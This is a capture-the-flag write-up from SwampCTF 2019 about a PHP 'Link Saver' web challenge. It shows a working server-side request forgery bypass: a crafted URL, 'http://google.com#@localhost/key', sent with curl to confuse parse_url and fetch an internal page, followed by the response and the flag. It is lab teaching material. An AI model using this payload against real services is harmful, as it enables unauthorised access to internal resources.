Tags: swampctf2019 


### Problem Description

It's the year 1997 and the Internet is just heating up! :fire:

In order to get ahead of the curve, SIT Industries® has introduced it's first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far to hire Kernel Sanders® to test the security!

However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_url magic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!

... or have they? :wink:


-= Created by andrewjkerr =-

- - - -

### Solution

After connecting to the [website](http://chal1.swampctf.com:1244/) of the challenge, we obtain the following page:


There was an input field in the page allowing us to send a request to the URL we wanted.

After some tries I noticed that the only accepted URL was _www.google.com_. Taking this into account, I tried injecting _http://google.com#@localhost/key_.

$ curl http://chal1.swampctf.com:1244/ --data="link=http://google.com#@localhost/key"

<title>Link Fetcher</title>
<h1>The Link Fetcher</h1>

Want to remember cool links? This link fetcher will fetch links and store them for you!

<form action="/" method="POST">
<input type="text" name="link" />
<input type="submit" />

Link added!

Link: http://google.com#@localhost/key

Title: The flag!

Description: flag{y0u_cANn0t_TRU5t_php}

<hr /></body>
Flag: **flag{y0u_cANn0t_TRU5t_php}**

Original writeup (https://oreoses.github.io/SwampCTF2019/).